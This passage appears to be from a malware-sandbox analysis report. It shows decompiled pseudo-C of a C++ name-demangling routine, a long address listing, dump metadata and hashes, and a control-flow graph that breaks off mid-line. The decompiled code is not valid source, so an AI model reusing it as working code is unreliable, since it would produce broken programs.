                                                    				if ((_t699 & r9d) != r13d) goto 0x23567ca4;
                                                    				_t815 = "}\'";
                                                    				 *(_t1003 + 0x38) = 2;
                                                    				 *(_t1003 + 0x30) = _t815;
                                                    				asm("movaps xmm0, [esp+0x30]");
                                                    				r8b = 0x7b;
                                                    				asm("movdqa [esp+0x50], xmm0");
                                                    				E00007FFC7FFC23566FA0(_t1003 + 0x40, _t1003 + 0x60);
                                                    				_t839 = _t815;
                                                    				E00007FFC7FFC23569BAC(0, _t839, _t1003 + 0x30, _t994, _t997, _t1031, _t1032, _t1037);
                                                    				_t286 = _t1000 - 0x20; // 0x5fe0
                                                    				E00007FFC7FFC23566F74(_t839, _t286, _t1003 + 0x30);
                                                    				E00007FFC7FFC23566F48(_t815, _t997, _t1003 + 0x50);
                                                    				goto 0x2356812f;
                                                    				if ((_t699 & 0x0000fc00) != r9d) goto 0x23567cc2;
                                                    				E00007FFC7FFC2356D7D8(_t699 & r9d, 0, _t699, (_t699 & 0x0000fc00) - r9d, _t997, _t1003 + 0x40, _t994, _t997, _t1003 + 0x50, _t1031, _t1032, _t1033);
                                                    				goto 0x2356812f;
                                                    				r12d = _t699;
                                                    				r12d = r12d & 0x00001800;
                                                    				r15d = 0x1200;
                                                    				_t656 = 0 | r12d == 0x00000800;
                                                    				 *(_t1000 + 0x70) = _t656;
                                                    				r13d = 0x1100;
                                                    				_t623 =  *(_t1000 + 0x68) & 0xffffff00 | (r13d & _t699) == 0x00000000;
                                                    				_t555 =  !=  ? _t656 : _t623;
                                                    				_t556 =  ~( !=  ? _t656 : _t623);
                                                    				asm("sbb edx, edx");
                                                    				_t693 = 0x1000 & _t699;
                                                    				if (r14d == 0) goto 0x23567dc8;
                                                    				r8d = _t699;
                                                    				r8d = r8d & 0x00001b00;
                                                    				asm("sbb eax, eax");
                                                    				if (((0 | r8d == 0x00001000) &  ~r14d) == 0) goto 0x23567d61;
                                                    				 *(_t1003 + 0x38) = 0x20;
                                                    				 *(_t1003 + 0x30) = "`local static destructor helper\'";
                                                    				asm("movaps xmm0, [esp+0x30]");
                                                    				asm("movdqa [esp+0x30], xmm0");
                                                    				E00007FFC7FFC23566FF8(_t693, _t699, "`local static destructor helper\'", _t839, _t1003 + 0x40, _t1003 + 0x30, _t997);
                                                    				goto 0x23567de1;
                                                    				asm("sbb eax, eax");
                                                    				if (((0 | r8d == r13d) &  ~r14d) == 0) goto 0x23567da4;
                                                    				 *(_t1003 + 0x38) = 0x30;
                                                    				 *(_t1003 + 0x30) = "`template static data member constructor helper\'";
                                                    				asm("movaps xmm0, [esp+0x30]");
                                                    				asm("movdqa [esp+0x30], xmm0");
                                                    				E00007FFC7FFC23566FF8(_t693, _t699, "`template static data member constructor helper\'", _t839, _t1003 + 0x40, _t1003 + 0x30, _t997);
                                                    				goto 0x23567e0f;
                                                    				asm("sbb eax, eax");
                                                    				if (((0 | r8d == r15d) &  ~r14d) == 0) goto 0x23567dc8;
                                                    				 *(_t1003 + 0x38) = 0x2f;
                                                    				goto 0x23567d83;
                                                    				if (r14d != 0) goto 0x23567ddd;
                                                    				if ((_t699 & r9d) == 0x7800) goto 0x23568120;
                                                    				if (_t693 == 0) goto 0x23567e4a;
                                                    				_t695 = _t699 & 0x00001b00;
                                                    				asm("sbb eax, eax");
                                                    				if (((0 | _t695 == r13d) &  ~r14d) != 0) goto 0x23567e0f;
                                                    				asm("sbb eax, eax");
                                                    				if (((0 | _t695 == r15d) &  ~r14d) == 0) goto 0x23567e4a;
                                                    				 *(_t1003 + 0x50) =  *(_t1003 + 0x50) & 0x00000000;
                                                    				 *(_t1003 + 0x58) =  *(_t1003 + 0x58) & 0x00000000;
                                                    				E00007FFC7FFC23568150(0x20, "`template static data member destructor helper\'", _t839, _t1003 + 0x50);
                                                    				E00007FFC7FFC23566F74(_t1003 + 0x50, _t1003 + 0x30, _t1003 + 0x40);
                                                    				_t819 =  *(_t1003 + 0x30);
                                                    				 *(_t1003 + 0x40) = _t819;
                                                    				goto 0x23567e64;
                                                    				E00007FFC7FFC2356A254(_t699, _t819, _t839, _t1003 + 0x60, _t1003 + 0x40, _t997, _t1003 + 0x40);
                                                    				 *(_t1003 + 0x40) =  *_t819;
                                                    				 *(_t1003 + 0x48) =  *(_t819 + 8);
                                                    				r13d = 0xb;
                                                    				_t624 =  !=  ?  *(_t1000 + 0x70) : _t623;
                                                    				 *(_t1000 + 0x68) = _t624;
                                                    				r15d = _t1035 - 3;
                                                    				if (_t624 == 0) goto 0x2356805e;
                                                    				_t576 =  *0x23574370; // 0x0
                                                    				if (( !(_t576 >> 9) & 0x00000001) == 0) goto 0x23567f89;
                                                    				_t626 = _t699 & 0x00000700;
                                                    				_t777 = _t626 - 0x200;
                                                    				_t580 =  !=  ? _t777 == 0 : _t1035 - 0xa;
                                                    				_t779 =  !=  ? _t777 == 0 : _t1035 - 0xa;
                                                    				if (( !=  ? _t777 == 0 : _t1035 - 0xa) == 0) goto 0x23567f0c;
                                                    				 *(_t1003 + 0x38) = 7;
                                                    				 *(_t1003 + 0x30) = "static ";
                                                    				asm("movaps xmm0, [esp+0x30]");
                                                    				asm("movdqa [esp+0x30], xmm0");
                                                    				E00007FFC7FFC23566CF4("static ", _t1003 + 0x60, _t1003 + 0x30);
                                                    				E00007FFC7FFC23566F74("static ", _t1003 + 0x30, _t1003 + 0x40);
                                                    				 *(_t1003 + 0x40) =  *(_t1003 + 0x30);
                                                    				 *(_t1003 + 0x48) =  *(_t1003 + 0x38);
                                                    				if (r14d == 0) goto 0x23567f19;
                                                    				_t781 = _t626 - 0x100;
                                                    				if (_t781 == 0) goto 0x23567f34;
                                                    				asm("bt edi, 0xa");
                                                    				if (_t781 >= 0) goto 0x23567f83;
                                                    				_t359 = _t839 - 0x400; // 0xe00
                                                    				if ((_t359 & 0xfffffcff) != 0) goto 0x23567f83;
                                                    				if (_t626 == 0x700) goto 0x23567f83;
                                                    				 *(_t1003 + 0x38) = r15d;
                                                    				 *(_t1003 + 0x30) = "virtual ";
                                                    				asm("movaps xmm0, [esp+0x30]");
                                                    				asm("movdqa [esp+0x30], xmm0");
                                                    				E00007FFC7FFC23566CF4("virtual ", _t1003 + 0x60, _t1003 + 0x30);
                                                    				E00007FFC7FFC23566F74("virtual ", _t1003 + 0x30, _t1003 + 0x40);
                                                    				 *(_t1003 + 0x40) =  *(_t1003 + 0x30);
                                                    				 *(_t1003 + 0x48) =  *(_t1003 + 0x38);
                                                    				_t588 =  *0x23574370; // 0x0
                                                    				if (( !(_t588 >> 7) & 0x00000001) == 0) goto 0x2356805e;
                                                    				_t698 = _t699 & 0x000000c0;
                                                    				_t785 = _t698 - 0x40;
                                                    				_t671 =  !=  ? _t785 == 0 :  *(_t1000 + 0x70);
                                                    				_t787 =  !=  ? _t785 == 0 :  *(_t1000 + 0x70);
                                                    				if (( !=  ? _t785 == 0 :  *(_t1000 + 0x70)) == 0) goto 0x23567fc7;
                                                    				 *(_t1003 + 0x38) = 9;
                                                    				goto 0x2356801b;
                                                    				_t788 = _t698 - 0x80;
                                                    				_t789 = r12d - 0x1000;
                                                    				_t595 =  !=  ? _t788 == 0 : _t789 == 0;
                                                    				_t791 =  !=  ? _t788 == 0 : _t789 == 0;
                                                    				if (( !=  ? _t788 == 0 : _t789 == 0) == 0) goto 0x23567ff6;
                                                    				 *(_t1003 + 0x38) = r13d;
                                                    				goto 0x2356801b;
                                                    				_t792 = _t698;
                                                    				_t793 = r12d;
                                                    				_t598 =  !=  ? _t792 == 0 : _t793 == 0;
                                                    				_t795 =  !=  ? _t792 == 0 : _t793 == 0;
                                                    				if (( !=  ? _t792 == 0 : _t793 == 0) == 0) goto 0x2356805e;
                                                    				 *(_t1003 + 0x38) = r15d;
                                                    				 *(_t1003 + 0x30) = "public: ";
                                                    				asm("movaps xmm0, [esp+0x30]");
                                                    				asm("movdqa [esp+0x30], xmm0");
                                                    				E00007FFC7FFC23566CF4("public: ", _t1003 + 0x60, _t1003 + 0x30);
                                                    				E00007FFC7FFC23566F74("public: ", _t1003 + 0x30, _t1003 + 0x40);
                                                    				 *(_t1003 + 0x40) =  *(_t1003 + 0x30);
                                                    				_t601 =  *(_t1003 + 0x38);
                                                    				 *(_t1003 + 0x48) = _t601;
                                                    				asm("sbb eax, eax");
                                                    				if ((_t699 & (_t601 & 0xfffff400) + 0x00001000) == 0) goto 0x235680cb;
                                                    				_t797 =  *0x23574370 & 0x00001000;
                                                    				if (_t797 != 0) goto 0x235680cb;
                                                    				 *(_t1003 + 0x38) = r15d;
                                                    				 *(_t1003 + 0x30) = "[thunk]:";
                                                    				asm("movaps xmm0, [esp+0x30]");
                                                    				asm("movdqa [esp+0x30], xmm0");
                                                    				E00007FFC7FFC23566CF4("[thunk]:", _t1003 + 0x60, _t1003 + 0x30);
                                                    				E00007FFC7FFC23566F74("[thunk]:", _t1003 + 0x30, _t1003 + 0x40);
                                                    				 *(_t1003 + 0x40) =  *(_t1003 + 0x30);
                                                    				 *(_t1003 + 0x48) =  *(_t1003 + 0x38);
                                                    				asm("bt edi, 0x10");
                                                    				if (_t797 >= 0) goto 0x23568120;
                                                    				 *(_t1003 + 0x38) = r13d;
                                                    				 *(_t1003 + 0x30) = "extern \"C\" ";
                                                    				asm("movaps xmm0, [esp+0x30]");
                                                    				asm("movdqa [esp+0x30], xmm0");
                                                    				E00007FFC7FFC23566CF4("extern \"C\" ", _t1003 + 0x60, _t1003 + 0x30);
                                                    				E00007FFC7FFC23566F74("extern \"C\" ", _t1003 + 0x30, _t1003 + 0x40);
                                                    				 *(_t1003 + 0x40) =  *(_t1003 + 0x30);
                                                    				 *(_t1003 + 0x48) =  *(_t1003 + 0x38);
                                                    				 *_t997 =  *(_t1003 + 0x40);
                                                    				_t610 =  *(_t1003 + 0x48);
                                                    				 *(_t997 + 8) = _t610;
                                                    				return _t610;
                                                    			}










































































                                                    0x7ffc235672a8
                                                    0x7ffc235672b8
                                                    0x7ffc235672bd
                                                    0x7ffc235672c4
                                                    0x7ffc235672d2
                                                    0x7ffc235672d5
                                                    0x7ffc235672db
                                                    0x7ffc235672de
                                                    0x7ffc235672e1
                                                    0x7ffc235672ea
                                                    0x7ffc235672f2
                                                    0x7ffc235672fc
                                                    0x7ffc235672fe
                                                    0x7ffc23567305
                                                    0x7ffc23567307
                                                    0x7ffc23567310
                                                    0x7ffc23567312
                                                    0x7ffc23567315
                                                    0x7ffc23567318
                                                    0x7ffc2356731c
                                                    0x7ffc23567327
                                                    0x7ffc23567329
                                                    0x7ffc23567334
                                                    0x7ffc23567337
                                                    0x7ffc2356733f
                                                    0x7ffc23567344
                                                    0x7ffc23567349
                                                    0x7ffc2356734e
                                                    0x7ffc23567354
                                                    0x7ffc23567356
                                                    0x7ffc2356735d
                                                    0x7ffc23567362
                                                    0x7ffc2356736a
                                                    0x7ffc23567370
                                                    0x7ffc23567377
                                                    0x7ffc23567381
                                                    0x7ffc23567384
                                                    0x7ffc23567398
                                                    0x7ffc2356739e
                                                    0x7ffc235673ab
                                                    0x7ffc235673ae
                                                    0x7ffc235673b2
                                                    0x7ffc235673b5
                                                    0x7ffc235673b9
                                                    0x7ffc235673c3
                                                    0x7ffc235673ce
                                                    0x7ffc235673d0
                                                    0x7ffc235673d6
                                                    0x7ffc235673dc
                                                    0x7ffc235673e0
                                                    0x7ffc235673e2
                                                    0x7ffc235673fd
                                                    0x7ffc235673ff
                                                    0x7ffc23567404
                                                    0x7ffc2356740f
                                                    0x7ffc23567419
                                                    0x7ffc2356742b
                                                    0x7ffc23567430
                                                    0x7ffc23567439
                                                    0x7ffc2356743e
                                                    0x7ffc23567440
                                                    0x7ffc23567449
                                                    0x7ffc2356744f
                                                    0x7ffc23567458
                                                    0x7ffc23567465
                                                    0x7ffc2356746b
                                                    0x7ffc23567476
                                                    0x7ffc23567482
                                                    0x7ffc23567485
                                                    0x7ffc23567497
                                                    0x7ffc235674a4
                                                    0x7ffc235674ae
                                                    0x7ffc235674be
                                                    0x7ffc235674c0
                                                    0x7ffc235674cd
                                                    0x7ffc235674d7
                                                    0x7ffc235674dc
                                                    0x7ffc235674e2
                                                    0x7ffc235674e9
                                                    0x7ffc235674ee
                                                    0x7ffc235674f4
                                                    0x7ffc235674fe
                                                    0x7ffc23567507
                                                    0x7ffc23567511
                                                    0x7ffc23567515
                                                    0x7ffc23567519
                                                    0x7ffc23567526
                                                    0x7ffc2356752b
                                                    0x7ffc23567532
                                                    0x7ffc2356753a
                                                    0x7ffc23567544
                                                    0x7ffc2356754e
                                                    0x7ffc23567554
                                                    0x7ffc2356755e
                                                    0x7ffc23567563
                                                    0x7ffc23567571
                                                    0x7ffc2356757c
                                                    0x7ffc23567580
                                                    0x7ffc23567582
                                                    0x7ffc2356758d
                                                    0x7ffc23567594
                                                    0x7ffc235675a8
                                                    0x7ffc235675ad
                                                    0x7ffc235675b0
                                                    0x7ffc235675b9
                                                    0x7ffc235675c3
                                                    0x7ffc235675c6
                                                    0x7ffc235675ca
                                                    0x7ffc235675d2
                                                    0x7ffc235675da
                                                    0x7ffc235675df
                                                    0x7ffc235675e3
                                                    0x7ffc235675e6
                                                    0x7ffc235675ea
                                                    0x7ffc235675ed
                                                    0x7ffc235675f1
                                                    0x7ffc235675f4
                                                    0x7ffc235675f9
                                                    0x7ffc235675fd
                                                    0x7ffc23567601
                                                    0x7ffc23567607
                                                    0x7ffc23567614
                                                    0x7ffc23567622
                                                    0x7ffc2356762b
                                                    0x7ffc2356763a
                                                    0x7ffc23567644
                                                    0x7ffc23567647
                                                    0x7ffc23567651
                                                    0x7ffc23567655
                                                    0x7ffc23567659
                                                    0x7ffc2356765c
                                                    0x7ffc23567663
                                                    0x7ffc2356766c
                                                    0x7ffc23567676
                                                    0x7ffc2356767e
                                                    0x7ffc23567683
                                                    0x7ffc23567688
                                                    0x7ffc23567694
                                                    0x7ffc2356769d
                                                    0x7ffc235676a8
                                                    0x7ffc235676ba
                                                    0x7ffc235676bc
                                                    0x7ffc235676c2
                                                    0x7ffc235676c8
                                                    0x7ffc235676cd
                                                    0x7ffc235676d1
                                                    0x7ffc235676db
                                                    0x7ffc235676dd
                                                    0x7ffc235676e6
                                                    0x7ffc235676e9
                                                    0x7ffc235676ed
                                                    0x7ffc235676f2
                                                    0x7ffc235676f7
                                                    0x7ffc235676fc
                                                    0x7ffc23567704
                                                    0x7ffc23567706
                                                    0x7ffc23567710
                                                    0x7ffc23567719
                                                    0x7ffc2356771d
                                                    0x7ffc23567726
                                                    0x7ffc2356772c
                                                    0x7ffc2356772f
                                                    0x7ffc23567735
                                                    0x7ffc23567743
                                                    0x7ffc2356774c
                                                    0x7ffc23567756
                                                    0x7ffc23567758
                                                    0x7ffc2356776a
                                                    0x7ffc2356776f
                                                    0x7ffc23567775
                                                    0x7ffc2356777a
                                                    0x7ffc2356777e
                                                    0x7ffc23567786
                                                    0x7ffc2356778f
                                                    0x7ffc2356779b
                                                    0x7ffc2356779f
                                                    0x7ffc235677a3
                                                    0x7ffc235677a7
                                                    0x7ffc235677aa
                                                    0x7ffc235677b7
                                                    0x7ffc235677bb
                                                    0x7ffc235677ca
                                                    0x7ffc235677cf
                                                    0x7ffc235677d1
                                                    0x7ffc235677e0
                                                    0x7ffc235677e6
                                                    0x7ffc235677f4
                                                    0x7ffc235677f8
                                                    0x7ffc235677ff
                                                    0x7ffc23567801
                                                    0x7ffc2356780a
                                                    0x7ffc23567811
                                                    0x7ffc23567815
                                                    0x7ffc2356781b
                                                    0x7ffc23567823
                                                    0x7ffc23567827
                                                    0x7ffc2356782c
                                                    0x7ffc23567836
                                                    0x7ffc2356783d
                                                    0x7ffc23567840
                                                    0x7ffc23567852
                                                    0x7ffc23567861
                                                    0x7ffc23567870
                                                    0x7ffc2356787b
                                                    0x7ffc23567888
                                                    0x7ffc2356789a
                                                    0x7ffc235678a0
                                                    0x7ffc235678a8
                                                    0x7ffc235678af
                                                    0x7ffc235678b9
                                                    0x7ffc235678be
                                                    0x7ffc235678c2
                                                    0x7ffc235678c8
                                                    0x7ffc235678cd
                                                    0x7ffc235678d9
                                                    0x7ffc235678de
                                                    0x7ffc235678eb
                                                    0x7ffc235678f0
                                                    0x7ffc235678fb
                                                    0x7ffc23567900
                                                    0x7ffc23567903
                                                    0x7ffc2356790a
                                                    0x7ffc2356790f
                                                    0x7ffc23567916
                                                    0x7ffc2356791a
                                                    0x7ffc23567927
                                                    0x7ffc23567938
                                                    0x7ffc23567943
                                                    0x7ffc23567945
                                                    0x7ffc23567948
                                                    0x7ffc2356794b
                                                    0x7ffc2356794d
                                                    0x7ffc23567953
                                                    0x7ffc23567957
                                                    0x7ffc2356795f
                                                    0x7ffc23567962
                                                    0x7ffc23567966
                                                    0x7ffc23567969
                                                    0x7ffc23567973
                                                    0x7ffc23567975
                                                    0x7ffc23567984
                                                    0x7ffc2356798e
                                                    0x7ffc23567998
                                                    0x7ffc2356799e
                                                    0x7ffc235679a3
                                                    0x7ffc235679af
                                                    0x7ffc235679b4
                                                    0x7ffc235679bd
                                                    0x7ffc235679c0
                                                    0x7ffc235679cd
                                                    0x7ffc235679d2
                                                    0x7ffc235679d4
                                                    0x7ffc235679e3
                                                    0x7ffc235679ed
                                                    0x7ffc235679f7
                                                    0x7ffc235679fd
                                                    0x7ffc23567a02
                                                    0x7ffc23567a07
                                                    0x7ffc23567a0e
                                                    0x7ffc23567a18
                                                    0x7ffc23567a27
                                                    0x7ffc23567a2d
                                                    0x7ffc23567a3a
                                                    0x7ffc23567a46
                                                    0x7ffc23567a48
                                                    0x7ffc23567a50
                                                    0x7ffc23567a54
                                                    0x7ffc23567a5f
                                                    0x7ffc23567a64
                                                    0x7ffc23567a6f
                                                    0x7ffc23567a76
                                                    0x7ffc23567a79
                                                    0x7ffc23567a7e
                                                    0x7ffc23567a8b
                                                    0x7ffc23567a90
                                                    0x7ffc23567a93
                                                    0x7ffc23567a9c
                                                    0x7ffc23567aa9
                                                    0x7ffc23567ab5
                                                    0x7ffc23567ac3
                                                    0x7ffc23567ac5
                                                    0x7ffc23567ace
                                                    0x7ffc23567ad3
                                                    0x7ffc23567aea
                                                    0x7ffc23567aec
                                                    0x7ffc23567af9
                                                    0x7ffc23567afe
                                                    0x7ffc23567b00
                                                    0x7ffc23567b0a
                                                    0x7ffc23567b0f
                                                    0x7ffc23567b21
                                                    0x7ffc23567b2a
                                                    0x7ffc23567b37
                                                    0x7ffc23567b3c
                                                    0x7ffc23567b4e
                                                    0x7ffc23567b50
                                                    0x7ffc23567b5d
                                                    0x7ffc23567b62
                                                    0x7ffc23567b64
                                                    0x7ffc23567b6e
                                                    0x7ffc23567b73
                                                    0x7ffc23567b85
                                                    0x7ffc23567b8e
                                                    0x7ffc23567b98
                                                    0x7ffc23567b9d
                                                    0x7ffc23567baf
                                                    0x7ffc23567bb3
                                                    0x7ffc23567bc0
                                                    0x7ffc23567bc9
                                                    0x7ffc23567bd7
                                                    0x7ffc23567bde
                                                    0x7ffc23567be6
                                                    0x7ffc23567bee
                                                    0x7ffc23567bf3
                                                    0x7ffc23567bfc
                                                    0x7ffc23567c01
                                                    0x7ffc23567c06
                                                    0x7ffc23567c0f
                                                    0x7ffc23567c1a
                                                    0x7ffc23567c25
                                                    0x7ffc23567c2f
                                                    0x7ffc23567c34
                                                    0x7ffc23567c3c
                                                    0x7ffc23567c3e
                                                    0x7ffc23567c45
                                                    0x7ffc23567c4d
                                                    0x7ffc23567c57
                                                    0x7ffc23567c61
                                                    0x7ffc23567c64
                                                    0x7ffc23567c6a
                                                    0x7ffc23567c76
                                                    0x7ffc23567c79
                                                    0x7ffc23567c86
                                                    0x7ffc23567c8a
                                                    0x7ffc23567c9a
                                                    0x7ffc23567c9f
                                                    0x7ffc23567cae
                                                    0x7ffc23567cb8
                                                    0x7ffc23567cbd
                                                    0x7ffc23567cc4
                                                    0x7ffc23567cc7
                                                    0x7ffc23567cce
                                                    0x7ffc23567cdb
                                                    0x7ffc23567ce1
                                                    0x7ffc23567ce4
                                                    0x7ffc23567cea
                                                    0x7ffc23567cf2
                                                    0x7ffc23567cf5
                                                    0x7ffc23567cf7
                                                    0x7ffc23567d05
                                                    0x7ffc23567d07
                                                    0x7ffc23567d0f
                                                    0x7ffc23567d12
                                                    0x7ffc23567d28
                                                    0x7ffc23567d2c
                                                    0x7ffc23567d2e
                                                    0x7ffc23567d3d
                                                    0x7ffc23567d47
                                                    0x7ffc23567d51
                                                    0x7ffc23567d57
                                                    0x7ffc23567d5c
                                                    0x7ffc23567d6e
                                                    0x7ffc23567d72
                                                    0x7ffc23567d7b
                                                    0x7ffc23567d83
                                                    0x7ffc23567d8d
                                                    0x7ffc23567d97
                                                    0x7ffc23567d9d
                                                    0x7ffc23567da2
                                                    0x7ffc23567db1
                                                    0x7ffc23567db5
                                                    0x7ffc23567dbe
                                                    0x7ffc23567dc6
                                                    0x7ffc23567dcb
                                                    0x7ffc23567dd7
                                                    0x7ffc23567ddf
                                                    0x7ffc23567de5
                                                    0x7ffc23567df6
                                                    0x7ffc23567dfa
                                                    0x7ffc23567e09
                                                    0x7ffc23567e0d
                                                    0x7ffc23567e0f
                                                    0x7ffc23567e1a
                                                    0x7ffc23567e21
                                                    0x7ffc23567e35
                                                    0x7ffc23567e3a
                                                    0x7ffc23567e3f
                                                    0x7ffc23567e48
                                                    0x7ffc23567e54
                                                    0x7ffc23567e5f
                                                    0x7ffc23567e64
                                                    0x7ffc23567e6e
                                                    0x7ffc23567e74
                                                    0x7ffc23567e77
                                                    0x7ffc23567e7a
                                                    0x7ffc23567e80
                                                    0x7ffc23567e86
                                                    0x7ffc23567e93
                                                    0x7ffc23567ea1
                                                    0x7ffc23567ea7
                                                    0x7ffc23567eb3
                                                    0x7ffc23567eb6
                                                    0x7ffc23567eb8
                                                    0x7ffc23567eba
                                                    0x7ffc23567ec9
                                                    0x7ffc23567ed3
                                                    0x7ffc23567edd
                                                    0x7ffc23567ee3
                                                    0x7ffc23567ef5
                                                    0x7ffc23567eff
                                                    0x7ffc23567f08
                                                    0x7ffc23567f0f
                                                    0x7ffc23567f11
                                                    0x7ffc23567f17
                                                    0x7ffc23567f19
                                                    0x7ffc23567f1d
                                                    0x7ffc23567f1f
                                                    0x7ffc23567f2a
                                                    0x7ffc23567f32
                                                    0x7ffc23567f34
                                                    0x7ffc23567f40
                                                    0x7ffc23567f4a
                                                    0x7ffc23567f54
                                                    0x7ffc23567f5a
                                                    0x7ffc23567f6c
                                                    0x7ffc23567f76
                                                    0x7ffc23567f7f
                                                    0x7ffc23567f89
                                                    0x7ffc23567f96
                                                    0x7ffc23567fa0
                                                    0x7ffc23567fa6
                                                    0x7ffc23567faf
                                                    0x7ffc23567fb2
                                                    0x7ffc23567fb4
                                                    0x7ffc23567fbd
                                                    0x7ffc23567fc5
                                                    0x7ffc23567fc9
                                                    0x7ffc23567fd4
                                                    0x7ffc23567fe1
                                                    0x7ffc23567fe4
                                                    0x7ffc23567fe6
                                                    0x7ffc23567fef
                                                    0x7ffc23567ff4
                                                    0x7ffc23567ff8
                                                    0x7ffc23567fff
                                                    0x7ffc23568008
                                                    0x7ffc2356800b
                                                    0x7ffc2356800d
                                                    0x7ffc23568016
                                                    0x7ffc2356801b
                                                    0x7ffc23568025
                                                    0x7ffc2356802f
                                                    0x7ffc23568035
                                                    0x7ffc23568047
                                                    0x7ffc23568051
                                                    0x7ffc23568056
                                                    0x7ffc2356805a
                                                    0x7ffc23568060
                                                    0x7ffc2356806e
                                                    0x7ffc23568070
                                                    0x7ffc2356807a
                                                    0x7ffc2356807c
                                                    0x7ffc23568088
                                                    0x7ffc23568092
                                                    0x7ffc2356809c
                                                    0x7ffc235680a2
                                                    0x7ffc235680b4
                                                    0x7ffc235680be
                                                    0x7ffc235680c7
                                                    0x7ffc235680cb
                                                    0x7ffc235680cf
                                                    0x7ffc235680d1
                                                    0x7ffc235680dd
                                                    0x7ffc235680e7
                                                    0x7ffc235680f1
                                                    0x7ffc235680f7
                                                    0x7ffc23568109
                                                    0x7ffc23568113
                                                    0x7ffc2356811c
                                                    0x7ffc23568125
                                                    0x7ffc23568128
                                                    0x7ffc2356812c
                                                    0x7ffc2356814c

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: /$[thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
                                                    • API String ID: 2943138195-2884338863
                                                    • Opcode ID: 3c8e260f429ca534fc2a0118edcb51743145eca1d7a9e37af3f6b8bd0001a60f
                                                    • Instruction ID: 51695c63a9e42144fe4faeb6caea9481286b8f712d59a4609ef6f6a9f780c087
                                                    • Opcode Fuzzy Hash: 3c8e260f429ca534fc2a0118edcb51743145eca1d7a9e37af3f6b8bd0001a60f
                                                    • Instruction Fuzzy Hash: 98927F72F18B9A86EB50CF24E8802AEB7A0FB84344F501175FA8E56A99DF7CD544CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 559 7ffc23568898-7ffc235688c6 560 7ffc23568d9e-7ffc23568db1 559->560 561 7ffc235688cc-7ffc235688e5 559->561 564 7ffc23568db4-7ffc23568db7 call 7ffc23566f74 560->564 562 7ffc235688e7 561->562 563 7ffc23568964-7ffc23568967 561->563 566 7ffc235688ed-7ffc235688f0 562->566 567 7ffc23568cb8-7ffc23568cdb call 7ffc23566ff8 562->567 568 7ffc23568ca2-7ffc23568cb3 call 7ffc23566b04 563->568 569 7ffc2356896d 563->569 570 7ffc23568dbc-7ffc23568dd8 564->570 572 7ffc235688f6-7ffc235688f9 566->572 573 7ffc23568c77-7ffc23568c9b call 7ffc23569d44 566->573 581 7ffc23568ce0-7ffc23568ce4 567->581 568->567 569->573 574 7ffc23568973-7ffc23568976 569->574 577 7ffc235688fb-7ffc235688fe 572->577 578 7ffc23568955-7ffc23568962 572->578 573->581 593 7ffc23568c9d 573->593 579 7ffc2356897c-7ffc2356897f 574->579 580 7ffc23568b74 574->580 584 7ffc23568900-7ffc23568903 577->584 585 7ffc2356894c-7ffc23568953 577->585 583 7ffc23568920-7ffc23568929 call 7ffc23566b04 578->583 586 7ffc23568b62-7ffc23568b68 579->586 587 7ffc23568985-7ffc23568989 579->587 588 7ffc23568b77-7ffc23568b91 580->588 589 7ffc23568d12-7ffc23568d19 581->589 590 7ffc23568ce6-7ffc23568ceb 581->590 583->581 595 7ffc2356893d-7ffc2356894a 584->595 596 7ffc23568905-7ffc23568908 584->596 594 7ffc2356891a 585->594 586->580 587->573 597 7ffc2356898f-7ffc235689a3 587->597 598 7ffc23568bf2-7ffc23568bf5 588->598 599 7ffc23568b93-7ffc23568bb6 call 7ffc2356b8a8 588->599 592 7ffc23568d20-7ffc23568d55 call 7ffc23566cf4 call 7ffc23566f74 589->592 600 7ffc23568d02-7ffc23568d10 590->600 601 7ffc23568ced-7ffc23568cf3 590->601 611 7ffc23568d58-7ffc23568d5c 592->611 593->568 594->583 595->583 606 7ffc2356892e-7ffc2356893b 596->606 607 7ffc2356890a-7ffc2356890d 596->607 608 7ffc23568aa0-7ffc23568aa3 597->608 609 7ffc235689a9 597->609 604 7ffc23568c5c-7ffc23568c72 call 7ffc2356b8a8 598->604 605 7ffc23568bf7-7ffc23568bfe 598->605 636 7ffc23568be3-7ffc23568bed 599->636 637 7ffc23568bb8-7ffc23568be0 call 7ffc23566ff8 599->637 600->592 601->611 612 7ffc23568cf5-7ffc23568cfb 601->612 604->570 616 7ffc23568c42-7ffc23568c44 605->616 617 7ffc23568c00-7ffc23568c16 call 7ffc23566b04 605->617 606->583 607->573 620 7ffc23568913 607->620 613 7ffc23568b5b-7ffc23568b60 608->613 614 7ffc23568aa9-7ffc23568aac 608->614 621 7ffc23568a8e-7ffc23568a9b 609->621 622 7ffc235689af-7ffc235689b2 609->622 618 7ffc23568d5e-7ffc23568d8a call 7ffc23568150 call 7ffc23566f74 call 7ffc23567078 611->618 619 7ffc23568d8f-7ffc23568d9c 611->619 612->611 624 7ffc23568cfd-7ffc23568d00 612->624 613->588 627 7ffc23568ab2-7ffc23568ab5 614->627 628 7ffc23568b40 614->628 616->604 632 7ffc23568c46-7ffc23568c57 call 7ffc23566b04 616->632 617->604 654 7ffc23568c18-7ffc23568c40 call 7ffc23566ff8 617->654 618->619 619->570 620->594 626 7ffc23568b4d-7ffc23568b56 call 7ffc23566b04 621->626 633 7ffc23568a51-7ffc23568a54 622->633 634 7ffc235689b8-7ffc235689bb 622->634 624->600 624->611 626->612 640 7ffc23568b31-7ffc23568b3e 627->640 641 7ffc23568ab7-7ffc23568aba 627->641 639 7ffc23568b47 628->639 632->604 646 7ffc23568a82-7ffc23568a89 633->646 647 7ffc23568a56-7ffc23568a59 633->647 649 